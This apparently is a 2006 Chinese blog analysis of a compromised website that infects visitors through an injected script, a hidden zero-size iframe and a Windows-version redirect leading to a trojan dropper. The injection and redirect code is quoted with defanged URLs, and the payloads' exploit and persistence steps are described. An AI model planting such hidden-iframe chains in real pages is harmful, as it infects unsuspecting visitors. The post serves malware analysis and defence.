endurer原创
2006-04-24第1版
在hxxp://www.hj234.com的主页有代码:
<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>
hxxp://www.***hj234.com/abc/abc.js的内容为:
document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")
hxxp://www.***hj234.com/abc/joke.htm的内容为:
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
会根据浏览者所用Windows版本,打开windows.htm,winnt.htm或w98.htm
从这个网页开始,所用的技术与发现一个使用技术升级、下载灰鸽子的网站相同。
这3个网页会下载/运行文件young.gif和young.css
young.gif是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:\wins.bat,c:\boot.hta,C:\wins.exe。
江民KV2006报为Exploit.VBS.Phel.ba
young.css用VB6编写,修改IE启动页,创建名为services.exe的文件,并在注册表的run键加入开机启动项,江民KV2006报为TrojanDropper.Delf.d